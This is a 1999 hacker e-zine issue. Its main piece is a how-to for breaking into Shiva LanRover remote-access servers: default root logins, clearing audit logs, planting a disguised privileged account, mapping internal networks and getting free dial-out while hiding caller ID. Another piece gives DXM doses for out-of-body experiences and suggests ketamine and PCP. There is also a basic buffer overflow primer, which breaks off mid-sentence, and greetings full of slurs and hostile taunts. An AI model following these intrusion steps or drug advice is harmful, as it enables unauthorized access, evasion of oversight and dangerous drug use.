[ from the unexplored areas of the human brain comes.. ] _________ ______ _________ _________ /\ ___ \ /| \ /\ ___ \ /\ ___ \ / \ \ /\ \ | | |\ \ / \ \ /\ \ / \ \ /\ \ \ \ \__\ \ | | |_\ \__\ \ \__\ \\ \ \ \ \ \ \ < | | \\ \ < \ \ \ \ \ \ \ ___ `\ |/\_____ _\\ \ ___ `\\ \ \ \ \ \ \ \ /\ \ / / \ \ \ \ \ /\ \\ \ \ \ \ \ \ \__\ \\/____ \ \ \ \ \__\ \\ \ \__\ \ \ \________\ \ \____\ \ \________\\ \________\ \ / / \ / / \ / / \ / / \/________/ \/____/ \/________/ \/________/ s e v e n the experience of new ideas and obtuse perspective [b4b0 inc. (c) 1999 all rights reserved] [ disrupting the classes of school teachers ] [ around the world. ] [ this zine is best viewed in vi ] [TABLE OF CONTENTS] (00). Greets, Hellos, Staff, What not. (01). Introduction - by ph1x *y0r elite edit0r* (heed my advice) (02). Hacking Shiva-Lan-Rover-Servers - [Hybrid] (03). How to have an out of body experience - [ph1x] (04). Womper language interpretor - [chrak] (06). Buffer overflow exploitation - [ph1x] (07). The stupidity that lies in credit fraud - [KKR] (08). Screwing around with /dev/audio - [ph1x] (09). My day in age(Firewall, a magic bullet?) - [rhinestone] (10). d0x (For your harrassing enjoyment) - [pG] (11). Coding a shell from the ground up - [ph1x] (12). The art of writing shell code - [smiler] (13). The telephone system/network part 1 - [pabell] (14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler] (15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x] (16). IRC lawgz, cybersex erotica - [b4b0] (17). Revolution against the catholic church - [schemerz] (18). bsaver.c overview - [cp4kt] (19). Conclusion - [ph1x] Additional pieces included in this issue of b4b0 are... [ bouncer.c ] ----------> /juarez/bouncer.c | intruderx [ Encrypt.c ] ----------> /juarez/encrypt.c | tragen [ GHCgi.c ] ------------> /juarez/Cgi.c | FreD [ Carp.c ] ----------> /juarez/carp.c | comp4ct [ Scanned dialups ] ----> /juarez/carriers | comp4ct [ FreeBSD rootkit ] ----> /juarez/fsd.gz | icesk [ b4b0 screensaver ] ---> /juarez/bsaver.c | cp4kt/qytpo [ el8 .zip of misc ] ---> /juarez/misc.zip | milcrat . -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- - | | ph1x ----------- -----> the chosen one : jsb4ch ---- --- -------> the undecided one . t1p ------- --------> acclaimed b4b0 adm1n gr1p ----- -- - -------> he whos accent slays . j\ ------ -- ---- -----> the freezing wonder chr4k ----- ------ ----> the one who operates with a blown mind comp4ct --- ------ ----> he whom claims to be a b4b0 saint . p4bell ---- ------ ----> the one called the golden child coss4ck ---------------> the one of proclamation sm1ler ----------------> he who is emotionally content . -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- - | | icesk emf zayten : pG schemerz Hybrid assem . Qytpo e- rhinestone samj jnz polder . --- Official IRC channel -> efnet / #b4b0 --- most idiotic site ever -> www.anticode.com --- irc chick of the month -> MostHated --- greets to -> #!animalcrackers, rhino9, samjs mom, duke, horizon, LJ & Falon, HNN, those who know who they are that have helped us and that we forgot about *sorry*, chixy + miah of the netcis crew (some of us started there!), the trench coat mafia, the NRA --- homosexual -> so1o (its good you came out of the closet) --- fuck yous -> DigiEbola, silitek (as always), those who live their lives around 'taking irc channels', and people who molest their children (u siq fuqz) --- note -> just because you have a southern accent and hate jews doesn't mean you don't have to pay your taxes. --- interesting fact -> the now irc fad of saying "HEH" was invented in #b4b0. so we must require you to say the following when using HEH : HEH (c) b4b0 1999 --- P.S. -> we need more supporters who will write things for us other than inetd backdoors. submit your article/code/remarks submissions@b4b0.org - -- ---> the bandz <--- -- - lo fidelity all stars, rage against the machine, the chemical brothers, the crystal method, misfits, minor threat, the decepticonz, danzig, and much, much much more! - -- ---> interesting <--- -- - -- -- > www.babo.com - best gossip in korea! -- -- > www.babo.net - aleman? -- -- > trench coat mafia - bang. -- -- > vandalisation of body - s4d1zm -- -- > british association of balloon operators (babo) - fear that. ------------------------------------------------------------------------------- !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! ------------------------------------------------------------------------------- Greatest movie of all time, "Gummo". ----> I walked into the fruit market today, the clerk thought I was some out of town hick. "Those apples will be 2 dollars a piece." He tells me. This is where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing me a dollar change, I say.. "keep it, were even." On the way out, I stepped on a grape. ****************************************************************************** [INTRODUCTION] ****************************************************************************** y0y0y0 We have had several people who have taken charge as editor for this issue, but have not followed through with there responsibilities. Therefore, me(ph1x) the unreliable drug addict has been chosen to get all of the submissions together and put together a nice issue with good quality reading material. I have miraculously managed to do so, so read to your hearts desire, and enjoy this issue. HEH!. PS. I apologize for the extreme lateness of this issue, its just that jsbach *cough* I mean.. various people said they were going to write articles, and never did. =) MISC: QUOTE: you are the maker of youre own destiny(Kwan = Gemmi) <-- These words inspired me. Real hackers drink chocolate milk! b4b0 site of the month: http://www.frognet.net/dxm <- CHECK IT OUT! L3tz giaT diZ sm4ck g01nG!@#$ -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Hacking the Shiva-LAN-Rover System -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- By Hybrid (th0rn@coldmail.com) April 1999 Contents: 1. Introduction 2. What can Shiva lan rovers do? 3. The command line 4. System security 5. PPP 1. Introduction Shiva systems are becoming increasingly popular in the LAN networking world. If like me you have done quite alot of scanning you would have come accross a login prompt similar to this: [@ Userid:] If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to fokus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems. The Shiva system is a network security problem in it's own right, in the sense that once you have gained access to one of these platforms, you have the opotunity to explore the entire network on which the system is based, in essance, you are on the trusted side of the firewall. If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW. To find a Shiva, the first thing you should do is dust off that old wardialer program, and start scanning local or toll-free prefix assignments, if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt: @ Userid: or if Radius authentification is enabled: Starting Radius Authentification.... @ Userid: Blah, ignore the radius authentification thing for now, it's just a lame attempt to make the system look as if it has been secured, in most cases the sysamin would have missconfigured the authentification and you will be supprised as to how easy it is to get in. So you are at the login prompt, what next? - As in most OS's Shivas have a nice set of default logins, so the sysadmins poor setup is your gain. Try this: login: pass: . The root login will work 9 times out of 10. The reason that the root account works alot is beacuse in some cases the admin is not even aware the account even exists! Most of the system setup is done via the main terminal, so the admin does'nt have to login. the root account is not listed in the userfile database, so most admin's overlook it. In some cases the admin would have set up there own acount with somthing like but if the admin has any common sense you will not get in with that. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything, once you are in, you can clear the system log, but more on that later. OK, you've found a Shiva, you've loged on as , now what? - read on. Once loged in, you will be droped into the Shiva command line prompt, which should look somthing like this: Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva) ShivaLanRover/8E# (The command prompt. Can be configured to say anything) To get a list of the available commands type or this will reveal a menu similar to this: ShivaLanRover/8E# ? alert Send text alert to all dial-in users busy-out line Busy-out serial line modem clear Reset part of the system comment Enter a comment into the log configure Enter a configuration session connect Connect to a shared serial port crashdump Write crashblock to log disable Disable privileges help List of available commands initialize Reinitialize part of the system lan-to-lan Manage LAN-to-LAN connections passwd Change password ping Send ICMP echo to IP host ppp Start a PPP session quit Quit from shell reboot Schedule reboot show Information commands, type "show ?" for list slip Start a SLIP session telnet Start a Telnet session testline Test a line The first thing you should do is check to see who is online, at the # prompt use the show command to reveal the list of current online users: ShivaLanRover/8E# show users Line User Activity Idle/Limit Up/Limit 1 jsmith PPP 0/ 10 0/ None 2 root shell 0/ 10 0/ None Total users: 2 So here we see ourselves loged in on line 2, and a PPP user on line 1. Note that most of the time users are not configured to be allowed remote dialin PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, ie- check the admin is not loged in. Now you need to get a rough idea of the size of the system and it's network. At the # prompt type: ShivaLanRover/8E# show lines Async Lines: Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs 1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0 3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0 6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 Here we see a list of the modem ports, as you can see it has 8, this is about average for most Shiva systems. So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is, to do this type: ShivaLanRover/8E# show arp Protocol Address Age Hardware Addr Type Interface Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP Showing the arp cache reveals some of the connected boxes to the LAN, aswell as ethernet address, and type of protocol. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file. 2. What can Shiva lan rovers do? Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin. A Shiva system can be configured to provide a wide variety of network services, some of which are listed here: PPP (point-to-point protocol) This is the key to gaining access to the network on which the Shiva is based upon, in most cases the network will have an internal DNS server, and if you are lucky, the network which the system is based will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas. Modem Outdial. In alot of cases the system would have been configured to allow modem outdialing which can be good for calling BBS's, diverting to other dialups, scanning, but again, this is lame, just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online, and at the same time call your favourite BBS. I'll explain how to do all of this later. Telnet, ping, traceroute etc. These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later. It's time to go into detail about all of the Shivas functions and commands, I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to. 3. The command line When loged into the Shiva shell, you have the following commands at your disposal: alert (Send text alert to all dial-in users) - Self explanitory. busy-out uart (Busy-out UART port) clear (Reset part of the system) The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc.. to do this all you need to do is type This will erase and reset the audit log, and also any invalid logins to the Shiva. There are also other clear commands such as etc, but these will all cause system problems and get you noticed, best leave this alone for the time being. comment (Enter a comment into the log) configure (Enter a configuration session) Heres the part where you can get the system to do what you want it to do, ie- to get a PPP connection you will need to set up another account with shell and PPP privalages. The root account does not allow PPP connections, so here is where you will need to do your stuff. To get anywhere with a Shiva you need to create a new account, using the config command you can create a new user account with greater privalges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system, you don't want to make an account that will stick out from the other accounts, so type: show security (this gives a list of the security configuration and the user list.) you should see somthing like this: [UserOptions] PWAttempts=0 ARARoamingDelimiter=@ ExpireDays=30 GraceLogins=6 [Users] admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425 jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052 mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052 user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159 another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9 jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821 msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052 dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052 padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1 ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052 Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely. In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one aswell. The idea is to make an account that will blend in with the others and not look to obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc, more on these functions in a bit. OK, now we need to set up our own account, to do this we need to enter a configuration session, at the command line prompt type: ShivaLanRover/8E# config You will then drop into the configuration session. Enter configuration file lines. Edit using: ^X, ^U clear line ^H, DEL delete one character ^W delete one word ^R retype line Start by entering section header in square brackets [] Finish by entering ^D or ^Z on a new line. config> (here is where you enter the config commands, to make you own account do the follwing) config> [users] config> username=/di/do/sh/tp/pw config> ^D <------ (type control D to finish) Review configuration changes [y/n]? y New configuration parameters: [users] username=/di/do/sh/tp/pw Modify the existing configuration [y/n]? y You may need to reboot for all changed parameters to take effect. You've just created your own user account which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password, you can later change this. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password, if you wanted to give yourself another root account, you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and login as your username, more on this later. connect (Connect to a serial port or modem) This is another one of the good features of Shivas, you can remotely control a series of modems on the system, and in alot of cases dialout. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors. To connect to a modem type: connect all_ports you will then drop into one of the modem pools, as follows: Connecting to Serial2 at 115200 BPS. Escape character is CTRL-^ (30). Type the escape character followed by C to get back, or followed by ? to see other options. (here basic modem commands are nessasary, use the follwing to dialout) ATZ (initialise modem) ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial with be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be somthing simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is loged into the audit file, along with the number you called. It is generaly a good idea to clear the audit log after things like PPP or dialout, again just type clear log . cping (Send continuous ICMP echoes to IP host) crashdump (Write crashblock to log) detect (Detect the configuration of an interface) disable (Disable your root privaleges) dmc (Information commands, type "dmc ?" for list) down (last Remove modems from CCB pool) info (Print info for specified modem) mupdate (l Update Rockwell modem FW) state (Print state of a modem) status (Print status of all modems) trace (Trace message passing) up (lastmo Add modems to CCB pool) test_1slot (Tests DMC card in slot specified) test_allcards (Tests all DMC cards found in system) test_golden (Tests all DMC cards against a Golden DMC) test_loopall (Tests All DMC's for count) test_modempair (modem1 Tests modems against each other) test_slotpair (Tests a DMC card against another) test_xmitloop (Tests modem pair for count) help (List of available commands) history (List of previous commands) initialize (Reinitialize part of the system) l2f (L2F commands) close (Close tunnel to L2F HG) login (Start L2F session) tunnels (Show open tunnels) lan-to-lan (Manage LAN-to-LAN connections) passwd (Change password) ping (Send ICMP echo to IP host) ppp (Start a PPP session) quit (Quit from shell) reboot (Schedule reboot) route (Modify a protocol routing table) rlogin (Start an rlogin session) show (Information commands, type "show ?" for list) show+ account (Accounting information) arp (ARP cache) bridge (Bridging information) buffers (Buffer usage) configuration (Stored configuration, may specify sections) the show config command will reveal all the system configuration setups, includings DNS server information, security configurations, IP routing etc. It will also show the internal IPs of radius authentification and TACAS servers. show+ finger (Current user status) interfaces [name1 [name2 ... ] (Interface information) ip (Internet Protocol information, type "show ip ?" for list) To get an idea of the routing information, and again how big the network is type, show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are, it is a good idea to note the IP prefixes. show+ lan-to-lan (LAN-to-LAN connections) license (Licensing information) lines (Serial line information) log (Log buffer) The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, ie- is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut down example as to what you wiuld see in a system log file: Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in 00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D 00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B) 00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast 00:00 4534 Serial4:PPP: IPCP layer up 00:04 4535 Serial4:PPP: CCP layer up 14:09 4536 Serial4:PPP: IPCP layer down 00:00 4537 Serial4:PPP: CCP layer down 00:00 4538 Serial4:PPP: LCP layer down 00:01 4539 Serial4:PPP: CD dropped on connection 00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,) 00:06 4541 Serial4: Rate 115200bps 00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:01 4543 Serial4: Initialized modem 04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44 18:27 4545 Serial4: New Dial-In session 00:00 4546 Serial4:PPP: LCP layer up 00:00 4547 Serial4: "krad" logged in 00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C 00:00 4549 Dialin:IPX configured net 9823O049 00:00 4550 Serial4:PPP: IPXCP layer up 00:00 4670 Serial4: New Command Shell session 00:03 4671 Serial4: "root" logged in 01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell) 00:06 4673 Serial4: Rate 115200bps 00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:00 4675 Serial4: Initialized modem 55:11 4676 Could not parse IP SNMP request. In the system log, you will also see invalid login attempts, error messages, and general system events. Because the log file logs everything, it is a good idea to erase your own presence in it. show+ modem (Internal modem information, type "show modem ?" for list) netbeui (NetBeui information, type "show netbeui ?" for list) novell (NetWare information, type "show novell ?" for list) ppp (PPP multilink bundles and links) processes (Active system processes) security (Internal userlist) semaphores (Active system semaphores) slot (Internal serial slot information, type "show slot ?" for list) upload (Upload information) users (Current users of system) version (General system information, also shows DNS info) virtual-connections (Virtual Connection information) slip (Start a SLIP session) telnet (Start a Telnet session) tftp (Download new image, ie- system config files) tunnel (Start a Tunnel session) wan [action] (Perform actions on WAN Interface) 4. System security Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system including Radius Authentification, SecurID, TACAS, and just the standard secured login. In some cases an admin will use a secondary server to act as the Radius Authentification. In this case, the setup would look somthing like this. [RADIUS Authentification Server] } The server contains a secured user | list, which will be used to verify | login requests. The login is [Router] determined if the user can be | | verified by the server. | | } The Shiva sends the login request to RADIUS. [Shiva System] } Starting Radius Authentification... @ Userid: Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above, but without the Radius server, a secondary shiva may be installed to act as the security server, whereas all other Shiva systems refer to it for user login verification. This can be a real bitch if you have loged into a system, but the above setup has been implemented. For example, say you loged in as root, and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing If the verification server has been setup, there will be no users in the user list, instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification srever, or primary Shiva, just use the show config command. you can then telnet from the Shiva you are on, to the Shiva displayed in the config file, you should then get the @ Userid: login screen again, try root no pass, if this does not work, it is possible to temorarily configure your own server on the network, but this would mean other users will not be able to login, so leave this alone. If you do manage to login to the server as root, you have to setup your user account there, because that is where all the Shivas on the network refer to in order to verify users, this way the admin only has to maintain one user configuration file. 5. PPP Once you have setup a user account with shell and PPP privaleges, you can begin exploring the network on which the Shiva is based upon. If the network is net connected you can get free net access aswell, but this is quite risky, especially if the admin notices PPP sessions active at 4am, with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network, or port scanner accross the domain which the Shiva is on. As on most networks, you are likely to come accross a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers, in one case someone I know found an Amiga box@$!. If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. using the command will give you control over the system modems, then you can dialout as if you where in terminal mode. If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dialup to the system directly. The mistake people make when it comes to ANI, or CLID is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong* the ANI service can be setup by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationaly, so your origionating clid gets striped at intralata boundarys on the PSTN. A technique, which I don't wanna give out involves trunk and carrier hoping. We'll thats about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com, they will have technical guides in pdf format, you can also download the shiva software from their ftp site. Shouts to the following: [9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp. [b4b0] gr1p t1p. #9x #darkcyde Efnet. backa xio. [D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- [Astral Projection] -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- How to have an out of body experience. ph1x. In this article I am going to explain what astral projection is, and my personal method of accomplishing it. NOTE: This method works for me while sober, and on dxm. This method may not work everyone, and is just my personal way of inducing OOBE. You may or may have not heard about people leaving there physical bodies and projecting thereselves into a higher dimension, known as the astral plain. Beleive it or not, this strange act of phenomina is totally real, and many people today practice methods that will eventually lead them to disociating themselves from there physical bodies. It is said by some that the whole sensation of leaving your body and exploring the astral plain is a state of mind. That is definatley not true. I myself, and many others have done experimentation. When you get up and step out of your body you are seeing what is going on in the world just as you would see it if you were in your physical body. You are just seeing it from the perspective of a different dimension. The 4th dimension. 3/12/99 - I ingested 500mg of dxm(Dextramethorphan helps induce OOBE) After the effects started coming on, I lay down in my bed. After about 15 minutes of rythmic breathing, my body was totally relaxed. I lay there with a clear mind. My body starts viberating after about another 5 minutes. After feeling like my chest was being crushed by some massive force I got a tingling sensation and I could see through my eye lids. From there, I laid a moment then lifted my arms slowly until I felt them slide out of my physical body. I satup and staired at my lifeless looking body. And I realized, my body is not me, it is just a shell for my soul. With that in mind I decided that I wanted to fly to seattle for no particular reason. After patrolling the streets of seattle where I once lived, I felt an urge to get back to my body but wanted to stop at my ex girlfriends house first. I sort of bounced my way up to her house by gliding through the air. I went into her room, where we previously used to sit and smoke pot. I saw a figure sitting in the desk chair with its back towards me. It slowly turned around, and it was rather a grotesque looking boy with a sort of transparent image. When he smiled, I realized that I had seen him before at my house in seattle when I woke up one night after a horrifying dream. I quickly flew back to my body, through blurs of colors and over trees and buildings. As I laid in my body, I felt like I couldnt get back in alignment. I started to get sorta freaked out but after a few minutes of struggling I managed to regain contact with my physical parts. True story? Of course. If you would like to try something like this, I am giving you my personal method in having out of body experiences. Expect this to take some practice and time. If you are willing to take dxm to help induce an OOBE, then great. It makes it 10 times easier. First lay down, on the floor or on your bed. Your head and feet should be even. Meaning you shouldnt be laying on a pillow or anything. Next with your hands at your sides, start out with rythmic breathing. Like so: Breath in for 2 seconds The whole time you are doing this rythmic Breath out for 4 seconds breathing, you should be letting yourself Breath in for 2 seconds get totally relaxed. Don't worry about Breath out for 4 seconds dozing off or entering a sleep state, Breath in for 2 seconds because that in itself could help you Breath out for 4 seconds leave your body. One of the main theories Breath in for 3 seconds behind astral projection is that you are Breath out for 6 seconds in a sleeping state while still being Breath in for 3 seconds in a conscious type state of mind. Breath out for 6 seconds On one occasion, I felt that I had fallen Breath in for 3 seconds asleep. Then I woke up, and stood up out Breath out for 6 seconds of bed. A second later I realized it was Breath in for 4 seconds a totally false awakening because I saw my Breath out for 8 seconds physical body laying there on my bed limp Breath in for 4 seconds and breathing. Another thing, as you are Breath out for 8 seconds doing this try to maybe breathe in a way Breath in for 4 seconds that you are breathing in correspondance Breath out for 8 seconds to your hearts rythm. For example, you feel your heart beat, then you breathe in for two seconds, you hear it beat again, then you breathe out for four seconds. Just experiment with it, and find your own technique in getting really relaxed. Repeat this method until every muscle in your body is relaxed to its fullest. After this, try to have a totally clear mind. Think about absolutely nothing. Concentrate only on your feet until they start to feel like they are floating. Move up to your hips and concentrate in the same manner. By now, you should start feeling powerful viberations throughout your body, like your being electricuted. You may even feel pain. But that is one of the things you will have to learn, trust that you will be ok. Don't back down, it is all a state of mind. After much viberations you may be able to see through your eye lids. This means you have succeeded. From here, picture yourself rising out of your body. And you may just find yourself sitting up and exiting your physical shell. You may say "What a huge crock of shit, leaving your body could not possibly be so easy." Yes, this method is fairly simple, but it takes much practice for your average person. It personally took myself several months to start getting anywhere in the experience after I reached the viberations. But after you get your first OOBE, there are many more to come. If you want to experience an OOBE possibly your first try, as I said before.. disociatives, like kentamine, pcp help induce them. But most noteably dxm (dextramethorphan). Check out http://www.frognet.net/~dxm for the dxm FAQ, or http://www.alaska.net/~zorak/dxm if you would like the download an issue of the dxm magazine. Conclusion, Hopefully this article gave you a little bit of insight as to what astral projection is all about. If you would like to furthur your knowledge in the area, search for "OOBE", "astral projection" etc. On a search engine. Or go to the library and check out a book on the subject. eg. "Leave your body in 21 days". Also http://www.winternet.com/~rsp/obebook.html is a good book by Robert Peterson on how to have OOBE, and its online in HTML! I hope you enjoyed the article =) ph1x@b4b0.org -------------------------------------------------------------------------------- Womper Language Interpretor, by chrak -------------------------------------------------------------------------------- This is a neat language interepor by chrak, that is still in developement. Check out /w0mper, and make sure to read Example.sh to see a set of example code. * NOTE * this isn't quite finished and hopefully chrak will come through with more releases. Thank you. ---------------------------------------------------------------------------------------- Buffer overflow exploitation, by ph1x ---------------------------------------------------------------------------------------- Buffer overflow exploitation. NOTE: This article does not explain how to write buffer overflows, but rather explains how they are taken advantage of. Ok, there have already been several articles released on buffer overflows and how they are taken advantage of. I talk to people on IRC every day who claim to have skillz, yet beleive it or not many of them do not have the slightest idea as to what a buffer overflow is, how they work, and how they are exploited. I'm going to give a brief introduction to them in this article, and im hoping that you will have a much better understanding of buffer overflows after going over this. I have a feeling that many people find aleph1's article to complex to understand, so I will try to put the concept of buffer overflows into your head with basic idea's. __________________________ |What is a buffer overflow?| A buffer overflow is just what it sounds like. Merely overflowing a buffer, with more data than it can hold. In doing so, you can change the execution of instruction by overwriting the return address on the stack. The stack is a type of data that is brought up by the ss(stack segment) register when a program is called to be executed. It is what the programs execution is based on. It has several functions, but the two important ones that we need to know, are PUSH and POP. PUSH adds data to the top of the stack, like instruction code. POP then removes the last piece of data on the stack, making it smaller. There is also an important register called the SP register (Stack Pointer), which points to the address of whatever is at the very top of the stack. This actually varies, depending on the processor. For example, intel and sparcs, the stack moves in a downward direction towards lower addresses. So the sp points to the top of the stack where new instruction is being placed. On other implementations the stack may move up, so the sp points to the bottom of the stack. In addition to the stack pointer, there is another register that is commonly reffered to as FP(Frame pointer). Which points to a frame on the stack. The distance from the SP(At the top of the stack), and FP(in one of the stack frames) are subtracted to find the address of local variables and access them. The return address is in charge of executing instruction as the addresses are moved down the stack. With all of this in mind, lets take a look at a simple example and see how the stack might look. --------------------------example1.c---------------------------------------- #include void integer(int x, y) { char bleh[10]; } void main(void) { integer(1,2); } ---------------------------------------------------------------------------- The stack would look like this. [ bleh ] [ FP ] [ RET ] [ X ] [ Y ] Top of the stack Bottom of the stack How in the hell does all this fit together??? Well, lets look at one more example. --------------------------example2.c---------------------------------------- #include void main(void){ char string[100]; int i; for(i=0;i<99;i++) { string[i] = 'A'; } overflow_dat_shiat(string); } overflow_dat_shiat(char *big_string) { char buffer[32]; strcpy(buffer, big_string); } ----------------------------------------------------------------------------- This code has an error. It uses strcpy() which supplies no bounds checking and copies 100 bytes of 'A' chars, into a buffer that is only 32 bytes. Therefore, everything on the stack after the 32 byte buffer is being over written with A's hex value which is 0x41. When this program is ran, it returns a segementation violation. Why? Because instead of the next set of instruction for the return address to execute being pushed down to ret(return address) it was mostly all overwritten with the continuous hex value of 0x41. Like 0x41414141. So when it tries executing the set of instruction assigned to 0x414141 it seg faults. Understanding this, think what would happen if we could get the return address to execute instructions assigned to a VALID address, maybe an address that holds code. Code that spawns a shell. We could gain root if the program were overflowing is +s. To not get very complex, im going to finish this article with a clean easy to understand example as to how we can accomplish doing this. We would want to fill the buffer we are overflowing with code that spawns a root shell, followed by the address of where the buffer we are overflowing starts. Take a look. 'X' stands for the code that executes a shell and will say that "0xF4" is the address of where 